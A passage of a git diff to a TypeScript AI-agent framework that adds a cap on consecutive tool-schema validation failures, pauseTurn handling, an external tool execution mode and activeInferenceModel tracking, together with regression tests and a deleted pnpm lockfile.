(native/addon/gsd_engine.{platform}.node) const releasePath = path.join(addonDir, `gsd_engine.${platformTag}.node`); try { - _loadedSuccessfully = true; return require(releasePath) as Record; + _loadedSuccessfully = true; return _require(releasePath) as Record; } catch (err) { const message = err instanceof Error ? err.message : String(err); errors.push(`${releasePath}: ${message}`); @@ -55,7 +56,7 @@ function loadNative(): Record { // 3. Try local dev build (native/addon/gsd_engine.dev.node) const devPath = path.join(addonDir, "gsd_engine.dev.node"); try { - _loadedSuccessfully = true; return require(devPath) as Record; + _loadedSuccessfully = true; return _require(devPath) as Record; } catch (err) { const message = err instanceof Error ? err.message : String(err); errors.push(`${devPath}: ${message}`); diff --git a/packages/native/src/stream-process/index.ts b/packages/native/src/stream-process/index.ts index 5fa3c2ab9..4a622b144 100644 --- a/packages/native/src/stream-process/index.ts +++ b/packages/native/src/stream-process/index.ts @@ -33,8 +33,8 @@ export function processStreamChunk( // Convert StreamState arrays to the format napi expects (Vec) const napiState = state ? { - utf8Pending: Buffer.from(state.utf8Pending), - ansiPending: Buffer.from(state.ansiPending), + utf8Pending: Array.from(state.utf8Pending), + ansiPending: Array.from(state.ansiPending), } : undefined; diff --git a/packages/pi-agent-core/src/agent-loop.test.ts b/packages/pi-agent-core/src/agent-loop.test.ts new file mode 100644 index 000000000..9eda6af35 --- /dev/null +++ b/packages/pi-agent-core/src/agent-loop.test.ts @@ -0,0 +1,357 @@ +// agent-loop tests +// Covers: pauseTurn handling (#2869), schema overload retry cap (#2783) + +import { describe, it, mock } from "node:test"; +import assert from "node:assert/strict"; +import { readFileSync } from "node:fs"; +import { join, dirname } from "node:path"; +import { fileURLToPath } from "node:url"; +import { Type } from "@sinclair/typebox"; +import { agentLoop, MAX_CONSECUTIVE_VALIDATION_FAILURES } from "./agent-loop.js"; +import type { AgentContext, AgentLoopConfig, AgentTool, AgentEvent, AgentMessage } from "./types.js"; +import { AssistantMessageEventStream, EventStream } from "@gsd/pi-ai"; +import type { AssistantMessage, AssistantMessageEvent, Model } from "@gsd/pi-ai"; + +const __dirname = dirname(fileURLToPath(import.meta.url)); + +describe("agent-loop — pauseTurn handling (#2869)", () => { + it("sets hasMoreToolCalls when stopReason is pauseTurn", () => { + const source = readFileSync(join(__dirname, "agent-loop.ts"), "utf-8"); + + // The agent loop must treat pauseTurn as a reason to continue the inner + // loop, just like toolUse. This prevents incomplete server_tool_use blocks + // from being saved to history, which would cause a 400 on the next request. + assert.match( + source, + /pauseTurn/, + "agent-loop.ts must handle the pauseTurn stop reason", + ); + + // Verify it sets hasMoreToolCalls = true for pauseTurn + assert.match( + source, + /stopReason\s*===?\s*["']pauseTurn["']/, + 'agent-loop.ts must check for stopReason === "pauseTurn"', + ); + }); + + it("pauseTurn is in the StopReason union type", () => { + // Read the pi-ai types to ensure pauseTurn is a valid StopReason + const typesPath = join(__dirname, "..", "..", "pi-ai", "src", "types.ts"); + const typesSource = readFileSync(typesPath, "utf-8"); + assert.match( + typesSource, + /["']pauseTurn["']/, + 'StopReason type must include "pauseTurn"', + ); + }); +}); + +/** + * Regression tests for #2783: Stuck-loop on execute-task — tool-call schema + * overload causes unbounded retry + budget burn. + * + * When the LLM repeatedly emits tool calls with arguments that fail schema + * validation, the agent loop retries indefinitely. Each failed validation + * returns an error tool result, the LLM retries with the same broken args, + * and the cycle never breaks — burning budget with no progress. + * + * The fix caps consecutive validation failures per turn at + * MAX_CONSECUTIVE_VALIDATION_FAILURES (default 3). Once the cap is hit, the + * loop injects a synthetic stop so the agent terminates cleanly instead of + * spinning forever. + */ + +// ─── Helpers ────────────────────────────────────────────────────────────────── + +const TEST_MODEL: Model<"anthropic-messages"> = { + id: "claude-test", + name: "Test Model", + api: "anthropic-messages", + provider: "anthropic", + contextWindow: 200_000, + maxOutput: 4096, + supportsImages: false, + supportsPromptCache: false, + thinkingLevel: undefined, +}; + +function makeToolWithSchema(): AgentTool { + return { + name: "write_file", + label: "Write File", + description: "Write content to a file", + parameters: Type.Object({ + path: Type.String(), + content: Type.String(), + }), + execute: async () => ({ + content: [{ type: "text" as const, text: "done" }], + details: {}, + }), + }; +} + +/** + * Creates a mock streamFn that returns assistant messages from a queue. + * Each call pops the next message. The messages simulate the LLM repeatedly + * emitting the same tool call with broken arguments. + */ +function createMockStreamFn(responses: AssistantMessage[]) { + let callIndex = 0; + + return function mockStreamFn(): AssistantMessageEventStream { + const message = responses[callIndex] ?? responses[responses.length - 1]; + callIndex++; + + const stream = new AssistantMessageEventStream(); + // Simulate async delivery + queueMicrotask(() => { + stream.push({ type: "start", partial: message }); + stream.push({ type: "done", message }); + stream.end(message); + }); + return stream; + }; +} + +function makeAssistantMessage(overrides: Partial = {}): AssistantMessage { + return { + role: "assistant", + content: [], + api: "anthropic-messages", + provider: "anthropic", + model: "claude-test", + usage: { input: 100, output: 50, cacheRead: 0, cacheWrite: 0, totalTokens: 150, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } }, + stopReason: "stop", + timestamp: Date.now(), + ...overrides, + }; +} + +function makeToolCallMessage(toolCallArgs: Record): AssistantMessage { + return makeAssistantMessage({ + content: [ + { + type: "toolCall", + id: `tc_${Date.now()}_${Math.random()}`, + name: "write_file", + arguments: toolCallArgs, + }, + ], + stopReason: "toolUse", + }); +} + +function collectEvents(stream: EventStream): Promise { + return new Promise(async (resolve) => { + const events: AgentEvent[] = []; + for await (const event of stream) { + events.push(event); + } + resolve(events); + }); +} + +// ─── Tests ──────────────────────────────────────────────────────────────────── + +describe("agent-loop — schema overload retry cap (#2783)", () => { + + it("terminates after MAX_CONSECUTIVE_VALIDATION_FAILURES consecutive schema failures", async () => { + const tool = makeToolWithSchema(); + + // LLM keeps sending tool calls with invalid args (missing required 'content' field) + const badToolCall = makeToolCallMessage({ path: "/tmp/test" }); // missing 'content' + const finalStop = makeAssistantMessage({ content: [{ type: "text", text: "I give up." }], stopReason: "stop" }); + + // Create enough bad responses to exceed the cap, plus a final stop + const responses: AssistantMessage[] = []; + for (let i = 0; i < MAX_CONSECUTIVE_VALIDATION_FAILURES + 5; i++) { + responses.push(badToolCall); + } + responses.push(finalStop); + + const mockStream = createMockStreamFn(responses); + + const context: AgentContext = { + systemPrompt: "You are a test agent.", + messages: [{ role: "user", content: [{ type: "text", text: "Write a file" }], timestamp: Date.now() }], + tools: [tool], + }; + + const config: AgentLoopConfig = { + model: TEST_MODEL, + convertToLlm: (msgs) => msgs.filter((m): m is any => m.role !== "custom"), + toolExecution: "sequential", + }; + + const stream = agentLoop( + [{ role: "user", content: [{ type: "text", text: "Write a file" }], timestamp: Date.now() }], + context, + config, + undefined, + mockStream as any, + ); + + const events = await collectEvents(stream); + + // Must have terminated (agent_end event present) + const agentEnd = events.find((e) => e.type === "agent_end"); + assert.ok(agentEnd, "agent loop must emit agent_end after hitting retry cap"); + + // Count how many turns had validation errors (tool_execution_end with isError: true) + const toolErrors = events.filter( + (e) => e.type === "tool_execution_end" && e.isError === true, + ); + + // Must not exceed the cap + assert.ok( + toolErrors.length <= MAX_CONSECUTIVE_VALIDATION_FAILURES, + `Expected at most ${MAX_CONSECUTIVE_VALIDATION_FAILURES} validation error tool results, got ${toolErrors.length}`, + ); + }); + + it("resets the failure counter when a tool call succeeds", async () => { + const tool = makeToolWithSchema(); + + // Pattern: 2 failures, 1 success, 2 failures, 1 success, then stop + const badCall = makeToolCallMessage({ path: "/tmp/test" }); // missing 'content' + const goodCall = makeToolCallMessage({ path: "/tmp/test", content: "hello" }); + const finalStop = makeAssistantMessage({ content: [{ type: "text", text: "Done." }], stopReason: "stop" }); + + const responses = [badCall, badCall, goodCall, badCall, badCall, goodCall, finalStop]; + const mockStream = createMockStreamFn(responses); + + const context: AgentContext = { + systemPrompt: "You are a test agent.", + messages: [{ role: "user", content: [{ type: "text", text: "Write a file" }], timestamp: Date.now() }], + tools: [tool], + }; + + const config: AgentLoopConfig = { + model: TEST_MODEL, + convertToLlm: (msgs) => msgs.filter((m): m is any => m.role !== "custom"), + toolExecution: "sequential", + }; + + const stream = agentLoop( + [{ role: "user", content: [{ type: "text", text: "Write a file" }], timestamp: Date.now() }], + context, + config, + undefined, + mockStream as any, + ); + + const events = await collectEvents(stream); + + // Must complete successfully since failures never reached cap consecutively + const agentEnd = events.find((e) => e.type === "agent_end"); + assert.ok(agentEnd, "agent loop must complete normally when failures are interspersed with successes"); + + // Should have processed all 6 tool-bearing turns + const toolExecEnds = events.filter((e) => e.type === "tool_execution_end"); + assert.ok(toolExecEnds.length >= 4, `Expected at least 4 tool executions (2 bad + 1 good + 2 bad + 1 good), got ${toolExecEnds.length}`); + }); + + it("exports MAX_CONSECUTIVE_VALIDATION_FAILURES as a configurable constant", () => { + assert.equal(typeof MAX_CONSECUTIVE_VALIDATION_FAILURES, "number"); + assert.ok(MAX_CONSECUTIVE_VALIDATION_FAILURES >= 2, "Cap must be at least 2 to allow one retry"); + assert.ok(MAX_CONSECUTIVE_VALIDATION_FAILURES <= 10, "Cap must not be unreasonably high"); + }); + + it("does NOT trip schema overload cap on tool execution errors like bash exit code 1 (#3618)", async () => { + // Simulates the real scenario: a tool (bash) that passes validation but + // throws during execution (e.g. rg/grep returning exit code 1 = no matches). + // These are valid tool invocations — the schema was correct, the tool ran, + // it just returned a non-zero exit code. The cap should only trigger for + // preparation/schema failures, not execution failures. + const bashTool: AgentTool = { + name: "bash", + label: "Bash", + description: "Run a bash command", + parameters: Type.Object({ + command: Type.String(), + }), + execute: async () => { + // Simulate bash tool rejecting on non-zero exit code + throw new Error("(no output)\n\nCommand exited with code 1"); + }, + }; + + // LLM sends valid tool calls (schema is correct) that fail at execution + const validBashCall = makeAssistantMessage({ + content: [ + { + type: "toolCall", + id: `tc_bash_${Date.now()}_${Math.random()}`, + name: "bash", + arguments: { command: "rg -l 'nonexistent' src/" }, + }, + ], + stopReason: "toolUse", + }); + const finalStop = makeAssistantMessage({ + content: [{ type: "text", text: "No references found." }], + stopReason: "stop", + }); + + // Send more than MAX_CONSECUTIVE_VALIDATION_FAILURES bash calls that throw + const responses: AssistantMessage[] = []; + for (let i = 0; i < MAX_CONSECUTIVE_VALIDATION_FAILURES + 2; i++) { + responses.push(validBashCall); + } + responses.push(finalStop); + + const mockStream = createMockStreamFn(responses); + + const context: AgentContext = { + systemPrompt: "You are a test agent.", + messages: [{ role: "user", content: [{ type: "text", text: "Search for references" }], timestamp: Date.now() }], + tools: [bashTool], + }; + + const config: AgentLoopConfig = { + model: TEST_MODEL, + convertToLlm: (msgs) => msgs.filter((m): m is any => m.role !== "custom"), + toolExecution: "sequential", + }; + + const stream = agentLoop( + [{ role: "user", content: [{ type: "text", text: "Search for references" }], timestamp: Date.now() }], + context, + config, + undefined, + mockStream as any, + ); + + const events = await collectEvents(stream); + + // Must complete normally — execution errors should NOT trigger the cap + const agentEnd = events.find((e) => e.type === "agent_end"); + assert.ok(agentEnd, "agent loop must emit agent_end"); + + // Count tool execution errors + const toolErrors = events.filter( + (e) => e.type === "tool_execution_end" && e.isError === true, + ); + + // All bash calls should have been attempted (not capped early) + assert.ok( + toolErrors.length >= MAX_CONSECUTIVE_VALIDATION_FAILURES + 2, + `Expected all ${MAX_CONSECUTIVE_VALIDATION_FAILURES + 2} bash execution errors to be processed (not capped), got ${toolErrors.length}`, + ); + + // The stop message should NOT contain the schema overload text + const allMessages = (agentEnd as any).messages as AgentMessage[]; + const lastMessage = allMessages[allMessages.length - 1]; + const lastText = lastMessage.role === "assistant" + ? (lastMessage as AssistantMessage).content.find((c) => c.type === "text") + : undefined; + if (lastText && lastText.type === "text") { + assert.ok( + !lastText.text.includes("consecutive turns with all tool calls failing"), + "Final message must NOT contain schema overload stop text for execution-only errors", + ); + } + }); +}); diff --git a/packages/pi-agent-core/src/agent-loop.ts b/packages/pi-agent-core/src/agent-loop.ts index 436f7b291..f8c7e9231 100644 --- a/packages/pi-agent-core/src/agent-loop.ts +++ b/packages/pi-agent-core/src/agent-loop.ts @@ -22,6 +22,15 @@ import type { StreamFn, } from "./types.js"; +/** + * Maximum number of consecutive turns where ALL tool calls in the turn fail + * schema validation before the loop terminates. This prevents unbounded retry + * loops when the LLM repeatedly emits tool calls with arguments that cannot + * pass validation (e.g., schema overload, truncated JSON, missing required + * fields). See: https://github.com/gsd-build/gsd-2/issues/2783 + */ +export const MAX_CONSECUTIVE_VALIDATION_FAILURES = 3; + export const ZERO_USAGE = { input: 0, output: 0, @@ -135,7 +144,10 @@ export function agentLoopContinue( (async () => { const newMessages: AgentMessage[] = []; - const currentContext: AgentContext = { ...context }; + const currentContext: AgentContext = { + ...context, + messages: [...context.messages], + }; stream.push({ type: "agent_start" }); stream.push({ type: "turn_start" }); @@ -172,6 +184,12 @@ async function runLoop( // Check for steering messages at start (user may have typed while waiting) let pendingMessages: AgentMessage[] = (await config.getSteeringMessages?.()) || []; + // Track consecutive turns where ALL tool calls fail validation. + // When the LLM repeatedly emits tool calls with schema-overloaded or malformed + // arguments, each turn produces only error tool results. Without a cap, this + // creates an unbounded retry loop that burns budget. (#2783) + let consecutiveAllToolErrorTurns = 0; + // Outer loop: continues when queued follow-up messages arrive after agent would stop while (true) { let hasMoreToolCalls = true; @@ -228,12 +246,38 @@ async function runLoop( return; } - // Check for tool calls + // Check for tool calls or paused server turn const toolCalls = message.content.filter((c) => c.type === "toolCall"); - hasMoreToolCalls = toolCalls.length > 0; + hasMoreToolCalls = + toolCalls.length > 0 || message.stopReason === "pauseTurn"; const toolResults: ToolResultMessage[] = []; - if (hasMoreToolCalls) { + if (hasMoreToolCalls && config.externalToolExecution) { + // External execution mode: tools were handled by the provider + // (e.g., Claude Code SDK). Emit tool_execution events for each + // tool call. The TUI adds these as components after the message. + for (const tc of toolCalls as AgentToolCall[]) { + stream.push({ + type: "tool_execution_start", + toolCallId: tc.id, + toolName: tc.name, + args: tc.arguments, + }); + stream.push({ + type: "tool_execution_end", + toolCallId: tc.id, + toolName: tc.name, + result: { + content: [{ type: "text", text: "(executed by Claude Code)" }], + details: {}, + }, + isError: false, + }); + } + // Don't add tool results to context or loop back — the streamSimple + // call already ran the full multi-turn agentic loop. + hasMoreToolCalls = false; + } else if (hasMoreToolCalls) { const toolExecution = await executeToolCalls( currentContext, message, @@ -248,6 +292,54 @@ async function runLoop( currentContext.messages.push(result); newMessages.push(result); } + + // Schema overload detection (#2783): count only preparation-phase + // errors (schema validation, tool-not-found, tool-blocked) toward the + // consecutive failure cap. Tool execution errors — such as bash + // commands returning non-zero exit codes (e.g. grep/rg exit 1 for + // "no matches") — are valid tool usage and must NOT trigger the cap. + // See: #3618 + const hasPreparationErrors = toolExecution.preparationErrorCount > 0; + const allToolsFailedPreparation = + toolResults.length > 0 && + toolExecution.preparationErrorCount === toolResults.length; + if (allToolsFailedPreparation) { + consecutiveAllToolErrorTurns++; + } else if (!hasPreparationErrors) { + // Reset only when there are zero preparation errors this turn. + // Mixed turns (some prep errors, some successes) don't reset, + // but they also don't increment — this avoids masking a + // pattern of alternating schema failures with one working call. + consecutiveAllToolErrorTurns = 0; + } + + if (consecutiveAllToolErrorTurns >= MAX_CONSECUTIVE_VALIDATION_FAILURES) { + // Force-stop: the LLM is stuck retrying broken tool calls. + // Emit the turn_end and terminate the agent loop cleanly. + stream.push({ type: "turn_end", message, toolResults }); + const stopMessage: AssistantMessage = { + role: "assistant", + content: [ + { + type: "text", + text: `Agent stopped: ${consecutiveAllToolErrorTurns} consecutive turns with all tool calls failing. This usually means the model is repeatedly sending arguments that do not match the tool schema.`, + }, + ], + api: config.model.api, + provider: config.model.provider, + model: config.model.id, + usage: ZERO_USAGE, + stopReason: "error", + errorMessage: "Schema overload: consecutive tool validation failures exceeded cap", + timestamp: Date.now(), + }; + emitMessagePair(stream, stopMessage); + newMessages.push(stopMessage); + stream.push({ type: "turn_end", message: stopMessage, toolResults: [] }); + stream.push({ type: "agent_end", messages: newMessages }); + stream.end(newMessages); + return; + } } stream.push({ type: "turn_end", message, toolResults }); @@ -370,6 +462,19 @@ async function streamAssistantResponse( return await response.result(); } +/** + * Result from executing tool calls in a turn. Includes metadata about + * error provenance so the schema overload detector can distinguish + * preparation failures (schema validation, tool-not-found, tool-blocked) + * from execution failures (the tool ran but threw, e.g. bash exit code 1). + */ +interface ToolExecutionResult { + toolResults: ToolResultMessage[]; + steeringMessages?: AgentMessage[]; + /** Number of tool results that failed during preparation (validation/schema). */ + preparationErrorCount: number; +} + /** * Execute tool calls from an assistant message. */ @@ -379,7 +484,7 @@ async function executeToolCalls( config: AgentLoopConfig, signal: AbortSignal | undefined, stream: EventStream, -): Promise<{ toolResults: ToolResultMessage[]; steeringMessages?: AgentMessage[] }> { +): Promise { const toolCalls = assistantMessage.content.filter((c) => c.type === "toolCall") as AgentToolCall[]; if (config.toolExecution === "sequential") { return executeToolCallsSequential(currentContext, assistantMessage, toolCalls, config, signal, stream); @@ -394,9 +499,10 @@ async function executeToolCallsSequential( config: AgentLoopConfig, signal: AbortSignal | undefined, stream: EventStream, -): Promise<{ toolResults: ToolResultMessage[]; steeringMessages?: AgentMessage[] }> { +): Promise { const results: ToolResultMessage[] = []; let steeringMessages: AgentMessage[] | undefined; + let preparationErrorCount = 0; for (let index = 0; index < toolCalls.length; index++) { const toolCall = toolCalls[index]; @@ -409,6 +515,9 @@ async function executeToolCallsSequential( const preparation = await prepareToolCall(currentContext, assistantMessage, toolCall, config, signal); if (preparation.kind === "immediate") { + if (preparation.isError) { + preparationErrorCount++; + } results.push(emitToolCallOutcome(toolCall, preparation.result, preparation.isError, stream)); } else { const executed = await executePreparedToolCall(preparation, signal, stream); @@ -438,7 +547,7 @@ async function executeToolCallsSequential( } } - return { toolResults: results, steeringMessages }; + return { toolResults: results, steeringMessages, preparationErrorCount }; } async function executeToolCallsParallel( @@ -448,10 +557,11 @@ async function executeToolCallsParallel( config: AgentLoopConfig, signal: AbortSignal | undefined, stream: EventStream, -): Promise<{ toolResults: ToolResultMessage[]; steeringMessages?: AgentMessage[] }> { +): Promise { const results: ToolResultMessage[] = []; const runnableCalls: PreparedToolCall[] = []; let steeringMessages: AgentMessage[] | undefined; + let preparationErrorCount = 0; for (let index = 0; index < toolCalls.length; index++) { const toolCall = toolCalls[index]; @@ -464,6 +574,9 @@ async function executeToolCallsParallel( const preparation = await prepareToolCall(currentContext, assistantMessage, toolCall, config, signal); if (preparation.kind === "immediate") { + if (preparation.isError) { + preparationErrorCount++; + } results.push(emitToolCallOutcome(toolCall, preparation.result, preparation.isError, stream)); } else { runnableCalls.push(preparation); @@ -480,7 +593,7 @@ async function executeToolCallsParallel( for (const skipped of remainingCalls) { results.push(skipToolCall(skipped, stream)); } - return { toolResults: results, steeringMessages }; + return { toolResults: results, steeringMessages, preparationErrorCount }; } } } @@ -512,7 +625,7 @@ async function executeToolCallsParallel( } } - return { toolResults: results, steeringMessages }; + return { toolResults: results, steeringMessages, preparationErrorCount }; } type PreparedToolCall = { diff --git a/packages/pi-agent-core/src/agent.test.ts b/packages/pi-agent-core/src/agent.test.ts new file mode 100644 index 000000000..e0b838cd4 --- /dev/null +++ b/packages/pi-agent-core/src/agent.test.ts @@ -0,0 +1,53 @@ +// Agent activeInferenceModel regression tests +// Verifies that activeInferenceModel is set/cleared correctly in _runLoop, +// and that the footer reads activeInferenceModel instead of state.model. +// Regression test for https://github.com/gsd-build/gsd-2/issues/1844 Bug 2 + +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; +import { readFileSync } from "node:fs"; +import { join, dirname } from "node:path"; +import { fileURLToPath } from "node:url"; + +const __dirname = dirname(fileURLToPath(import.meta.url)); + +describe("Agent — activeInferenceModel (#1844 Bug 2)", () => { + it("activeInferenceModel is declared in AgentState interface", () => { + const typesSource = readFileSync(join(__dirname, "types.ts"), "utf-8"); + assert.match(typesSource, /activeInferenceModel\??:\s*Model/, + "AgentState must declare activeInferenceModel field"); + }); + + it("_runLoop sets activeInferenceModel before streaming and clears in finally", () => { + const agentSource = readFileSync(join(__dirname, "agent.ts"), "utf-8"); + + // Must set activeInferenceModel = model before streaming starts + const setLine = agentSource.indexOf("this._state.activeInferenceModel = model"); + assert.ok(setLine > -1, "agent.ts must set activeInferenceModel = model in _runLoop"); + + // Must clear activeInferenceModel = undefined after streaming completes + const clearLine = agentSource.indexOf("this._state.activeInferenceModel = undefined"); + assert.ok(clearLine > -1, "agent.ts must clear activeInferenceModel in finally block"); + + // The set must come before the clear + assert.ok(setLine < clearLine, "activeInferenceModel must be set before cleared"); + }); + + it("footer displays activeInferenceModel instead of state.model", () => { + const footerPath = join(__dirname, "..", "..", "pi-coding-agent", "src", + "modes", "interactive", "components", "footer.ts"); + const footerSource = readFileSync(footerPath, "utf-8"); + assert.match(footerSource, /activeInferenceModel/, + "footer.ts must reference activeInferenceModel for display"); + }); + + it("activeInferenceModel is set before AbortController creation", () => { + const agentSource = readFileSync(join(__dirname, "agent.ts"), "utf-8"); + + const setLine = agentSource.indexOf("this._state.activeInferenceModel = model"); + const abortLine = agentSource.indexOf("this.abortController = new AbortController"); + assert.ok(setLine > -1 && abortLine > -1); + assert.ok(setLine < abortLine, + "activeInferenceModel must be set before streaming infrastructure is created"); + }); +}); diff --git a/packages/pi-agent-core/src/agent.ts b/packages/pi-agent-core/src/agent.ts index 112573650..e65ae7a35 100644 --- a/packages/pi-agent-core/src/agent.ts +++ b/packages/pi-agent-core/src/agent.ts @@ -101,6 +101,13 @@ export interface AgentOptions { * Default: 60000 (60 seconds). Set to 0 to disable the cap. */ maxRetryDelayMs?: number; + + /** + * Determines whether a model uses external tool execution (tools handled + * by the provider, not dispatched locally). Evaluated per-loop so model + * switches mid-session are handled correctly. + */ + externalToolExecution?: (model: Model) => boolean; } /** @@ -144,6 +151,7 @@ export class Agent { private _maxRetryDelayMs?: number; private _beforeToolCall?: AgentLoopConfig["beforeToolCall"]; private _afterToolCall?: AgentLoopConfig["afterToolCall"]; + private _externalToolExecution?: (model: Model) => boolean; constructor(opts: AgentOptions = {}) { this._state = { ...this._state, ...opts.initialState }; @@ -158,6 +166,7 @@ export class Agent { this._thinkingBudgets = opts.thinkingBudgets; this._transport = opts.transport ?? "sse"; this._maxRetryDelayMs = opts.maxRetryDelayMs; + this._externalToolExecution = opts.externalToolExecution; } /** @@ -457,6 +466,8 @@ export class Agent { const model = this._state.model; if (!model) throw new Error("No model configured"); + this._state.activeInferenceModel = model; + this.runningPrompt = new Promise((resolve) => { this.resolveRunningPrompt = resolve; }); @@ -497,6 +508,7 @@ export class Agent { getFollowUpMessages: async () => this.dequeueFollowUpMessages(), beforeToolCall: this._beforeToolCall, afterToolCall: this._afterToolCall, + externalToolExecution: this._externalToolExecution?.(model) ?? false, }; let partial: AgentMessage | null = null; @@ -581,6 +593,7 @@ export class Agent { this._state.isStreaming = false; this._state.streamMessage = null; this._state.pendingToolCalls = new Set(); + this._state.activeInferenceModel = undefined; this.abortController = undefined; this.resolveRunningPrompt?.(); this.runningPrompt = undefined; diff --git a/packages/pi-agent-core/src/proxy.ts b/packages/pi-agent-core/src/proxy.ts index 619521bda..574ec2bf6 100644 --- a/packages/pi-agent-core/src/proxy.ts +++ b/packages/pi-agent-core/src/proxy.ts @@ -47,7 +47,7 @@ export type ProxyAssistantMessageEvent = | { type: "toolcall_end"; contentIndex: number } | { type: "done"; - reason: Extract; + reason: Extract; usage: AssistantMessage["usage"]; } | { diff --git a/packages/pi-agent-core/src/types.ts b/packages/pi-agent-core/src/types.ts index cfeba8895..846764edd 100644 --- a/packages/pi-agent-core/src/types.ts +++ b/packages/pi-agent-core/src/types.ts @@ -193,6 +193,16 @@ export interface AgentLoopConfig extends SimpleStreamOptions { * The hook receives the agent abort signal and is responsible for honoring it. */ afterToolCall?: (context: AfterToolCallContext, signal?: AbortSignal) => Promise; + + /** + * When true, tool calls in assistant messages are rendered in the TUI + * but NOT executed locally. Used for providers that handle tool execution + * internally (e.g., Claude Code CLI via Agent SDK). + * + * The agent loop emits tool_execution_start/end events for TUI rendering + * but skips tool.execute() and does not add tool results to context. + */ + externalToolExecution?: boolean; } /** @@ -239,6 +249,12 @@ export interface AgentState { streamMessage: AgentMessage | null; pendingToolCalls: Set; error?: string; + /** + * The model currently being used for inference. Set at _runLoop() start, + * cleared when the loop ends. When present, UI should display this instead + * of `model` to avoid showing a stale value after a mid-turn model switch. + */ + activeInferenceModel?: Model; } export interface AgentToolResult { diff --git a/packages/pi-agent-core/tsconfig.json b/packages/pi-agent-core/tsconfig.json index 6f6331d49..26fd8b429 100644 --- a/packages/pi-agent-core/tsconfig.json +++ b/packages/pi-agent-core/tsconfig.json @@ -23,5 +23,5 @@ "rootDir": "./src" }, "include": ["src/**/*.ts"], - "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts"] + "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts", "src/**/*.test.ts"] } diff --git a/packages/pi-ai/pnpm-lock.yaml b/packages/pi-ai/pnpm-lock.yaml deleted file mode 100644 index 89cc9199b..000000000 --- a/packages/pi-ai/pnpm-lock.yaml +++ /dev/null @@ -1,2022 +0,0 @@ -lockfileVersion: '9.0' - -settings: - autoInstallPeers: true - excludeLinksFromLockfile: false - -importers: - - .: - dependencies: - '@anthropic-ai/sdk': - specifier: ^0.73.0 - version: 0.73.0(zod@4.3.6) - '@aws-sdk/client-bedrock-runtime': - specifier: ^3.983.0 - version: 3.1009.0 - '@google/genai': - specifier: ^1.40.0 - version: 1.45.0 - '@mistralai/mistralai': - specifier: 1.14.1 - version: 1.14.1 - '@sinclair/typebox': - specifier: ^0.34.41 - version: 0.34.48 - ajv: - specifier: ^8.17.1 - version: 8.18.0 - ajv-formats: - specifier: ^3.0.1 - version: 3.0.1(ajv@8.18.0) - chalk: - specifier: ^5.6.2 - version: 5.6.2 - openai: - specifier: 6.26.0 - version: 6.26.0(ws@8.19.0)(zod@4.3.6) - proxy-agent: - specifier: ^6.5.0 - version: 6.5.0 - undici: - specifier: ^7.24.2 - version: 7.24.4 - zod-to-json-schema: - specifier: ^3.24.6 - version: 3.25.1(zod@4.3.6) - devDependencies: - '@smithy/node-http-handler': - specifier: ^4.5.0 - version: 4.5.0 - -packages: - - '@anthropic-ai/sdk@0.73.0': - resolution: {integrity: sha512-URURVzhxXGJDGUGFunIOtBlSl7KWvZiAAKY/ttTkZAkXT9bTPqdk2eK0b8qqSxXpikh3QKPnPYpiyX98zf5ebw==} - hasBin: true - peerDependencies: - zod: ^3.25.0 || ^4.0.0 - peerDependenciesMeta: - zod: - optional: true - - '@aws-crypto/crc32@5.2.0': - resolution: {integrity: sha512-nLbCWqQNgUiwwtFsen1AdzAtvuLRsQS8rYgMuxCrdKf9kOssamGLuPwyTY9wyYblNr9+1XM8v6zoDTPPSIeANg==} - engines: {node: '>=16.0.0'} - - '@aws-crypto/sha256-browser@5.2.0': - resolution: {integrity: sha512-AXfN/lGotSQwu6HNcEsIASo7kWXZ5HYWvfOmSNKDsEqC4OashTp8alTmaz+F7TC2L083SFv5RdB+qU3Vs1kZqw==} - - '@aws-crypto/sha256-js@5.2.0': - resolution: {integrity: sha512-FFQQyu7edu4ufvIZ+OadFpHHOt+eSTBaYaki44c+akjg7qZg9oOQeLlk77F6tSYqjDAFClrHJk9tMf0HdVyOvA==} - engines: {node: '>=16.0.0'} - - '@aws-crypto/supports-web-crypto@5.2.0': - resolution: {integrity: sha512-iAvUotm021kM33eCdNfwIN//F77/IADDSs58i+MDaOqFrVjZo9bAal0NK7HurRuWLLpF1iLX7gbWrjHjeo+YFg==} - - '@aws-crypto/util@5.2.0': - resolution: {integrity: sha512-4RkU9EsI6ZpBve5fseQlGNUWKMa1RLPQ1dnjnQoe07ldfIzcsGb5hC5W0Dm7u423KWzawlrpbjXBrXCEv9zazQ==} - - '@aws-sdk/client-bedrock-runtime@3.1009.0': - resolution: {integrity: sha512-0k9d0oO6nw3Y6jtgs1cmMPNuwAVPQahIoshKK3NDfhVQR1wNC90/gSpdfa9GKswe8XRq/ZZlq7ny0qM1rd/Hkg==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/core@3.973.20': - resolution: {integrity: sha512-i3GuX+lowD892F3IuJf8o6AbyDupMTdyTxQrCJGcn71ni5hTZ82L4nQhcdumxZ7XPJRJJVHS/CR3uYOIIs0PVA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-env@3.972.18': - resolution: {integrity: sha512-X0B8AlQY507i5DwjLByeU2Af4ARsl9Vr84koDcXCbAkplmU+1xBFWxEPrWRAoh56waBne/yJqEloSwvRf4x6XA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-http@3.972.20': - resolution: {integrity: sha512-ey9Lelj001+oOfrbKmS6R2CJAiXX7QKY4Vj9VJv6L2eE6/VjD8DocHIoYqztTm70xDLR4E1jYPTKfIui+eRNDA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-ini@3.972.20': - resolution: {integrity: sha512-5flXSnKHMloObNF+9N0cupKegnH1Z37cdVlpETVgx8/rAhCe+VNlkcZH3HDg2SDn9bI765S+rhNPXGDJJPfbtA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-login@3.972.20': - resolution: {integrity: sha512-gEWo54nfqp2jABMu6HNsjVC4hDLpg9HC8IKSJnp0kqWtxIJYHTmiLSsIfI4ScQjxEwpB+jOOH8dOLax1+hy/Hw==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-node@3.972.21': - resolution: {integrity: sha512-hah8if3/B/Q+LBYN5FukyQ1Mym6PLPDsBOBsIgNEYD6wLyZg0UmUF/OKIVC3nX9XH8TfTPuITK+7N/jenVACWA==} - engines: {node: '>=20.0.0'} - - 